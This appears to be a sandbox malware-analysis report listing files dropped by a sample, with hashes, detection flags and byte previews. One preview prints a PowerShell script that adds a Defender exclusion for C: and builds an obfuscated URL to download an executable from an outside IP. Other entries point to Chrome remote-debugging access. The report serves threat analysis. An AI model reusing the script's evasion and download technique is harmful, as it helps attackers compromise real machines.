SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\3790H479RI5F\VSJECJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\615578\Participating.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7066995651175142
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq9:2JIB/wUKUKQncEmYRTwh0p
MD5:	CDF9B160AEE599AE27387285DF2B1972
SHA1:	C8542703401115074E0B26CA8684C1DDB1E4E562
SHA-256:	6727BC9824370B1692EAF38918ACC32AC124A5F903320E343063291E9791D136
SHA-512:	FF57D69F33AB60F85F32E3C2A9E0B32656A91CC222F5F2C268EC7D43AC100D251A8B28A79D55CEE9AC28A7CCD08224DC15D1D37576235330794D7F41388E0F18
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x0fc3aebd, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7900193509759077
Encrypted:	false
SSDEEP:	1536:jSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:jazaPvgurTd42UgSii
MD5:	8A910DB616C403EA2A55EFA535B2AE92
SHA1:	C4D270AFE76DA1517E4DFFEB0416F00FED95A229
SHA-256:	3D20BB6C10BCFF1C8902720B64CCE4F9966EE5C0A9F8DAB8755E42B1D02AB879
SHA-512:	D85E9110C1AFA56FD473953777393649A9B218819FD7C513AB408E2CB54EF8878BC7338B4C00C6AA17E9E314421FD57CAC1EFC1B8803E82F73E884F36B46E389
Malicious:	false
Preview:	...... ...............X\...;...{......................0.`.....42...{5..4...\|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................,..4...\|]..................3.2.4...\|=..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08145414892623956
Encrypted:	false
SSDEEP:	3:zYeULQZCoqt/57Dek3JtJ5t/allEqW3l/TjzzQ/t:zzQQYFR3tj5Qmd8/
MD5:	837073740BB299A61808AC62421FCB0A
SHA1:	48820D697F29BF4718CA4C7B044599087A85361F
SHA-256:	C6EE90C68028B841CAE439036C1AF5E6F3665B907B9E64ABF7034DF608F333D2
SHA-512:	430F0CA93B3E77C940580032B60839FDFA11B7246496C7248AD37064873D9F5F2746DBF72EE3EFF778689BE61A9A0D7E053A4C1C45594CEF4B2648FD54EFA25F
Malicious:	false
Preview:	...I.....................................;...{...4...\|=.42...{5.........42...{5.42...{5...Y.42...{59.................3.2.4...\|=.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.239696782083497
Encrypted:	false
SSDEEP:	6:kKwl99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:4aDImsLNkPlE99SNxAhUe/3
MD5:	103C92E66BE7253C51B5AF18E7CCFF19
SHA1:	8FAB59F94D77FA1A7CC8EB15171687BDDC8C6BF4
SHA-256:	5624F95E24BAE7092CA60464A1EA7470D0FE109011B039ED62D007A1472DD4CF
SHA-512:	1C6E0EF7E6BDE47DE615556B7F2C1A9C31837300171A852060FB509DA53D0235C7E6341710973299986B5D185C5159CAFFE6C1F78EFB1E629C29B10C25B57AEF
Malicious:	false
Preview:	p...... .........q/?TP..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\din[1].exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1357367
Entropy (8bit):	7.966288323697462
Encrypted:	false
SSDEEP:	24576:C3+N6VbU/lx01RMCHCeMyipDIwATowO1vgc9HQHfw9hSTVbB4:v6bUn0XM4M3DIH8wGPMIcbW
MD5:	C6E90B3A98ECB4AB74A9AAF8155D1BC0
SHA1:	0A29A790AB82DDA61C5622586FBDBF46223B2989
SHA-256:	08BAE1BB8A881FF6A6A25F988D73DEF21B6D65D262960BC4706534F479B85B62
SHA-512:	A0DCF48ABD2DF0B1D9AFD33A49027047B53830F52BB0C16745FC953EAA9D38F15720496CBCF62EB17FCFA5A955CEADC16ABFE8817350B6F528312E3429DAA5AA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p...........@.................................@...........r_...................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...r_.......`..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\615578\Participating.com
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.386600646979388
Encrypted:	false
SSDEEP:	48:SfNaoCzyqTECzifNaoC3CTC3+fNaoCxC94CxnfNaoCBqRC0UrU0U8CB4:6NnC5TECuNnC3CTC3mNnCpChNnCj0UrX
MD5:	7F2D3C061ADDA1CEF42E374177833551
SHA1:	41DEFAA17311063FFAC349BE12B4CB5387D3DA4E
SHA-256:	DDE6A83A87BA4F9E66E29358CF97F82E9625781B5B10004A9722DF84A5D14A1E
SHA-512:	47900F0894476FF06924E6E6281F119C419A0A2C0A809D72EEEC370783CE288AB850FBFF6EDC86DF8615068ACCF79A8E359AC2A43359E57C775DE8049CF82A18
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/13CEB235A45AE6B970E6BE8F3191446C",.. "id": "13CEB235A45AE6B970E6BE8F3191446C",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/13CEB235A45AE6B970E6BE8F3191446C"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/463BEEDDFBA47479B375411BDD88104B",.. "id": "463BEEDDFBA47479B375411BDD88104B",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/463BEEDDFBA47479B375411BDD88104B"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.006225694120903
Encrypted:	false
SSDEEP:	384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeYo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiYo+OdBANZD
MD5:	6EC700FCB0AE97553EC01FAEA088C747
SHA1:	2D184B28CB5949B49AD548781AD33CDE9BE1F100
SHA-256:	B60FC2B328749BD47822EE102E4F1D1618278CB6C899C9A2AAEF97C1F6410AEF
SHA-512:	D889E914C32104F69181E9880E4ABE98B71B3BDE0784AA7A8D3F20CE083CFACDB922A63935239339AA195A6B1AEB4C69C994C37A08E041C56A5CB5C91049F9DE
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\2975.ps1

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Unicode text, UTF-8 text
Category:	modified
Size (bytes):	1770
Entropy (8bit):	5.55084563461871
Encrypted:	false
SSDEEP:	48:prNWSSYERJNP55ScY5fIWRFQFvm57ySRKEwQXRuxZ/L0Y:1WNx55W0V27mxJ
MD5:	9B7420EA12621A5DDB6FA05014579761
SHA1:	3FC24DA3889C529504C275FDD46DE1265F70D049
SHA-256:	3C77C7BE777F4655541B583E332B58B0F20AEBD3D8F7FEBD0157F3370636D570
SHA-512:	A8B0C72F8E9D8448432A5FAD6C3B15FF2CA7DBEB2FAD28156CEF12FFFEC04D765AC8AC174274324972D7322EACD8DFA1825DF9B3BF6A49665968074F2D2C11EF
Malicious:	false
Preview:	# .......... . ...........$alias = "IEX".$cmd = 'Add-MpPreference -ExclusionPath "C:\"'..# .......... ........& $alias $cmd..# ........ 15 .......Start-Sleep -Seconds 10..# .......... . ................ ........$z1 = "h"; $m2 = "t"; $l3 = "t"; $f4 = "p"; $x5 = ":"; .$j6 = "/"; $a7 = "/"; $s8 = "1"; $n9 = "3"; $t0 = "8"; $g7 = ".";.$g1 = "1"; $q2 = "2"; $h3 = "4"; $u4 = "."; $b5 = "6"; .$v6 = "0"; $o7 = "."; $p8 = "1"; $y9 = "3"; $cw0 = "3"; .$eg1 = "/"; $i2 = "d"; $k3 = "i"; $w4 = "n"; $r5 = "."; .$y6 = "e"; $c7 = "x"; $e8 = "e";..# ......... URL . ...............$europe = ($z1 + $m2 + $l3 + $f4 + $x5 + $j6 + $a7 + $s8 + $n9 + $t0 + $g7 + $g1 + $q2 + $h3 + $u4 + $b5 + $v6 + $o7 + $p8 + $y9 + $cw0 + $eg1 + $i2 + $k3 + $w4 + $r5 + $y6 + $c7 + $e8);..# .... ... .......... ..... . ................ ....... ...........$dirPath =

C:\Users\user\AppData\Local\Temp\615578\Participating.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: fm2r286nqT.exe, Detection: malicious, Browse Filename: nB52P46OJD.exe, Detection: malicious, Browse Filename: lem.exe, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse Filename: SET_UP.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: SET_UP.exe, Detection: malicious, Browse Filename: Set-Up.exe, Detection: malicious, Browse Filename: OR8Ti8rf8h.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\615578\w

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	373840
Entropy (8bit):	7.9995728004816185
Encrypted:	true
SSDEEP:	6144:veZ0WH6nrEkXxnBSXId+l7bsRqI5ijEvTb2sFZiF/l87rhlr/QEc1mP548lsIq3y:2Gbnr97Tg7bsRrvvTb2IEJm7rhlpc1Q3
MD5:	41070830A1D7CF6C017432A535B36603
SHA1:	BE6061D00A555BAC7BBB375E92721A08EB49B374
SHA-256:	F3F47B5A9F345F319F62965EC98D443D67E41E9B3747A9C7E086F4631E613AB6
SHA-512:	96D8AFFEA85644A2306A74890CB46512D645C753418B5AB2618A20C4F1E3CDE02F1214781AEA6CFCE2F025C3020B0BE8B7FAABDDCB9FD9E9D88BB480EDEBB0F9
Malicious:	false
Preview:	.H.....m4...=.../.;.1..!..p[..E.!..2.[.V...ma.VF;:.d..7.7.rZ.y.{....m.7..G. .E4>.......`O.'..m..o.aT...0S....z4/..!..1..'.y.o......QU...3.J .2...t.U..0..GI..o.k..WY..5~.`_F.2X..."mC...S..NPaD..j.rB....}.....Xa.....F.P......HX..[H=i..:......a..j.,B.(,.{.zix..l.$yg1....."....W../..Ai.......7....P. z1.M..d... ~.=.g8.}....'c..".@........[2@..4X..s.QR.W..&/.5.!.....3^D&...U....-M...5A......%...P.TS..j+......4$.....d^...Fx~}..6.].....\|O.Ae....<z.k.6....;k.X...n.Hjy....v.G...I..\.&.?...A...dm........'.$....@!.).....P.....:...6U.......D.e.....w..C.q.._.d........_..daY4i.g..yb.[...!7.o.!......7..a..C..L....TI.o..h..'.E.@...p...J...m.U.}k...O.....H...V.\|.%.5..<...fS.B.'sr....<Z...j.YXpF...P.A.,.:qFo...*.?.....C..D..~:...t!Od.iI.....=....0.bTl.>O...@..sf3...rP$[b...j....D-O.u....N........S......\?}.s...9..L.]P....Y...x.).&\bX....E...._%..................}....:..........3.?..-?...%3)..-iM...O..Q1_.. ......=..H.0..kk../TU...n.5.o.......c@...hU......

C:\Users\user\AppData\Local\Temp\Administrator

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	132096
Entropy (8bit):	6.709344621558516
Encrypted:	false
SSDEEP:	3072:6HS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJRi:6HS3zcNPj0nEo3tb2j6AUkBq
MD5:	1481869CD51B6F6CA30D06B74217F715
SHA1:	58676D72212D32592E851E7702610FB6639F721B
SHA-256:	EF80017FDAF3B745EAABFF5D9AB27EEE4E579B70937FC76AEC55B0F4FE64844F
SHA-512:	8A438FCC2A6C3B2711CA0350ED494E09EA5A2E10F4AFBD5FD8FA13B77B905B4B2BD38D0C906747B570787B1F92ABE3A37BF7E8EEBFA26535910AAC74830A9963
Malicious:	false
Preview:	...E...................R.&\........................@......>.t................G..p........v.........G..p........v.................$.X{E....p..Z......j..6..............P..p.I.j......p../......j..6.i......r....K..(F..j..R......\......k..j..=......G...Q....<.........2.....j....'.................E..j.S.q..............u....[..m....I..p....ON....E....CN..;.............9E...........^.......U...;...J...wz.$..{E..A.......cI....t-.J.j..U.....m....U.................U......R.YZ...U.......).U.........@..U......9.t....U........U......C...........H....t..J.j..U......m....E......R..Y............+..........@.....;.t...............G..p.......v......v..z................$..{E..7.$....v...........G..P........R...........G..p........v..........m..P.M..E.............D......l..P.M..E.............E...P.A.........E.P.M.....P...l......:...M..l...M..l...M..l...............E..E.....P...E......E......jl......C...M..Zl........Ol.............?l.......5l......F........

C:\Users\user\AppData\Local\Temp\Breed

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	6.632388268865748
Encrypted:	false
SSDEEP:	1536:nu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+o:TcBiqXvpgF4qv+32eOyKODOSpQS/
MD5:	C8E947C43B991812032046EF8E7F7F23
SHA1:	AC7B043C5EA80DEA7CA897FF0B028970A2D8D48F
SHA-256:	AA181F836EAC912CF4CD5B1D35EC8E625D9954E91DF54CF3A24A75CFF3DE4CDF
SHA-512:	EF52AF2EE72107400F62A6F237532C8E19CD5356661E32C0AFE97DD17F5EB68FBB0A376C9EF103D507DA6C95A1699C45F03C45C6CECCED398EDC452106B7BC6D
Malicious:	false
Preview:	..E.............@....u.j..h...Y.j.h .L......e..j......Y.e...5..L.....35d.M...u..u.. ...Y.d.M..E.................u.j......Y.h.M...U..E...t....t............."......].h.M...]..U..E..M.SV3..W8].t.j-ZCf...p......3..u...BW...w..B0f.....C..t.;].r.;].r..E.3.f.....j"^.0....... 3.f.....f.....f.....f.....;.r.3._^[]..U.....M.3..U.S.].V..E.W8E.t.j-Xf...s.3.@..E......}..u.j..u.RQ.....M...E..]...v...W....0f.....G..u...t.;}.r.;}..}.r..E.3.f......j"^.0........ 3.f.....f.....f.....f.....;.r.3._^[..]..U..M.V..u....j.^.0.......<.U...t.3.8E.f.....@;.w..y...j"..u..F..."w..u.VRQ.u..[......^]..U..Q3..}..u.9E...\|.9E.s..E.....E..u..u.j..u..u..u......E......]..U..Q.}..u..}...E..\|..E...u..u.j..u..u.......E......]..U..Q.}..u..}...E..\|..E...u..u..u..u..u...........]..U..U.V.u.W..:...+.u.+.f..t......:....+.t._^..y....].3......]..U..E...t...]..t....t..}.....w..u..}.....w.2.]..U..E...t...]..t+...t..}.....r.w.}..w..u..}.....r.w.}..w.2.]..U..E..M..U....H...t...]..U...

C:\Users\user\AppData\Local\Temp\Computing

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	83968
Entropy (8bit):	5.199065505253537
Encrypted:	false
SSDEEP:	768:eSGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3RM:6Kaj6iTcPAsAhxjgarBM
MD5:	F55DD31462ABAE0519B216841FA69CA6
SHA1:	D6A89E75FF168858CDCF066A02EA61F24260A27D
SHA-256:	B5E714BE839E76A64CC5FB2A20ACB6FD10CD693C632542FB80A5106AE2DE4043
SHA-512:	D8A6D656E356FD61B0B2D628B92F54FC3E94C00A89F77ADD057C9BCEFA79608E1FB361A17383766070E2245C6138BFBB5D942264D2354590BAE78AB73832E320
Malicious:	false
Preview:	............................................................................................................................................................................................................................................................................................................................................................................................r...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Describe

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	132096
Entropy (8bit):	6.5651215077777465
Encrypted:	false
SSDEEP:	3072:tCThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6g:tCThp6vmVnjphfhnvO5bLezWWt/Dd3g
MD5:	B135956E0A289E21B23DEC6FA3F2B7C5
SHA1:	FC7D4EB12DB7E736F4F133623304F8F5240FF6D5
SHA-256:	ABF6C4E5E91E350CE1EE28B5866AA21606C630C256C776035ED88F85AE4880AB
SHA-512:	A52E18351FE5EA4E76E8F865F24D8D604B5463FA3208739E36760967E4698977D5F3CBEA2B6930D43870E82E24D221A474A2FA11A8F2E44E9657F750684AD0BC
Malicious:	false
Preview:	p....t?.D$0.L$,HP....f.8\t.u.....k..3..F........!...f;T$......@......C..p.........V..L$.3.S.t$..)^..YY.........:j........L$h.d.....t=j........L$h.O.....t(3.SP...H....3....u....Xk...F............L$P..D....$......D...L$x..C...L$@..C...C..p....6....N..D$@P.D$.P..$....P..$.............L$.3.P....3.f9.u-Q.L$D....3.f9.u.h.sL..L$.....hl~L..L$D......$....P.L$0..B...D$xP.L$0.....D$.P.L$0.....D$@P.L$0.....C..0.......N..D$PP.T$0.d..Y.L$P.)a..<.u.8D$.t...uF.C..\|$P.0...R....F.QW.L$h.0.....t7.T$(3.SP...H.........u.....j.......u.....i..3....F......L$`.%....L$@..@...L$x..@....$.....@...L$P.@...L$,.@...L$..@.._^3.[..]...U......LSVW.}.3.\$............G..H..]L...O.....D$..D$..I..GL...........L$(..B...L$8..B...G..p....S....N..D$8SSP.T$4......D$4.L$$.D$$....D$,.D$..D$0.D$ .D$4.D$$...D$8P.....9\$.tM.L$.._....u@.t$..L$L.V5...L$H.]....L$H.....?......].t....h...#..C........]....}K...L$....}?...L$8.t?...L$(.k?....tS.D$..D$....]..G..p....u....E..~..@..0...c....N...j..t$..Z..YY..u....&h..

C:\Users\user\AppData\Local\Temp\Impose

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	132096
Entropy (8bit):	6.685933257410447
Encrypted:	false
SSDEEP:	3072:IU4CE0Imbi80PtCZEMnVIPPBxT/sZydTmRxE:IhClbfSCOMVIPPL/sZ6
MD5:	EDA2509E2493D9559513438F2B03F941
SHA1:	CE86099167F42CDEDDE5624E8D6F328FF77C486A
SHA-256:	9AFA32F0F9CB4B7F24A5645A5AE6A8B71B1C996DAD733698C443258F6E5CAEB0
SHA-512:	8117D3AC324736F6A62DCB68198012D92FAD7F7CEF702E6338D358FDDC8C39F2D4E852DC4C4C1941B58EDC0506C0CCA2FA81A241FB8D14322584210E24ECB589
Malicious:	false
Preview:	.X.......Y...Y...Y...\...Y.......\...X.f..L$.f......\...\.f....>J.f......\.......X...\...\.f...%....=................-.?.....@..+.-p<.................\...\.f..%.>J.f.T.f.T...\.f.W.`@..f..........Y...\...\...Y...Y.f.(. .J...Y...-...Y.f.(.0.J...X.f.p....X.....+........-..........................X.......X..=J.f.Y...\..=J.f.Y...\.........f.(.@.J.f.(5.=J.f.Y.f.X.f.p....Y.f.W...?....X.f......X.f..%.>J.f.n...YT$...Y.f.s.-f.p.Df.(=.=J...X.f.Y...X.f...f.Y...Y.f.Y.f.X.f.Y...Y.f.p....Y.f.p....Y...Y...X.....X...X...X.f..D$..D$.....f..L$.f....=J.f.~.....f.T.f.s. f.~.......................................f.s.4f.V.....f.n.f.s..f...f...f...f...f.v.f.....................%....=..........f..L$.f..T$......f.n.f.T..=J.f.s.4f...f...0>J.f...f.v.f...%...................r^.....f....=J.f....=J..&...f..\|$.f..d$.f.~.f.s. f.~...%....=......r...................^........f.W...C..f....f..=.=J.f....=J...Y.f.~.f.s. f.~....tRf.T.....f.T..=J.f.s.,f....f.V.%.......%......Y<..gJ.f..,..gJ...f.(4..kJ...>...\...

C:\Users\user\AppData\Local\Temp\Intro

Download File

Process:	C:\Users\user\AppData\Local\Temp\putt.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	7.9975008377832495
Encrypted:	true
SSDEEP:	1536:kV15FrEa26+37OMzj1yiyGqpNV2sbJ/AvTmRD/pqImNSG:kTjEB7nb5qFRYTmRrpySG
MD5:	144ADD6C1E2DE398367C49658EF8D922
SHA1:	D769F3D40A745A16269444D75562342DE39C2139
SHA-256:	E6840DAA37F9ADAC305CF15C1DA490CAA991C9969527E0CED9AA47286CF8B522
